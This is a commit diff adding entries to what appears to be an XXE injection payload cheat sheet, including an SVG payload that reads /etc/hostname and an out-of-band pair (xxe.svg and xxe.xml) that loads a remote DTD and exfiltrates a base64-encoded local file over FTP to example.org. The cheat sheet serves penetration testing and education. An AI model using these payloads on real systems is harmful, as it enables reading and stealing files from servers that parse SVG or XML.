Merge pull request #128 from noraj/patch-1
XXE: add XXE via SVG rasterization
This commit is contained in:
commit
ac0239d332
@ -380,7 +380,9 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
||||
</svg>
|
||||
```
|
||||
|
||||
```
|
||||
**Classic**
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" standalone="yes"?>
|
||||
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
|
||||
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
|
||||
@ -388,6 +390,38 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
||||
</svg>
|
||||
```
|
||||
|
||||
**OOB via SVG rasterization**
|
||||
|
||||
*xxe.svg*
|
||||
|
||||
```xml
|
||||
<!DOCTYPE svg [
|
||||
<!ELEMENT svg ANY >
|
||||
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
|
||||
%sp;
|
||||
%param1;
|
||||
]>
|
||||
<svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red">
|
||||
<text x="15" y="100" style="fill:black">XXE via SVG rasterization</text>
|
||||
<rect x="0" y="0" rx="10" ry="10" width="200" height="200" style="fill:pink;opacity:0.7"/>
|
||||
<flowRoot font-size="15">
|
||||
<flowRegion>
|
||||
<rect x="0" y="0" width="200" height="200" style="fill:red;opacity:0.3"/>
|
||||
</flowRegion>
|
||||
<flowDiv>
|
||||
<flowPara>&exfil;</flowPara>
|
||||
</flowDiv>
|
||||
</flowRoot>
|
||||
</svg>
|
||||
```
|
||||
|
||||
*xxe.xml*
|
||||
|
||||
```xml
|
||||
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
|
||||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>">
|
||||
```
|
||||
|
||||
### XXE inside SOAP
|
||||
|
||||
```xml
|
||||
@ -495,3 +529,4 @@ updating: xl/sharedStrings.xml (deflated 17%)
|
||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||
- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
||||
|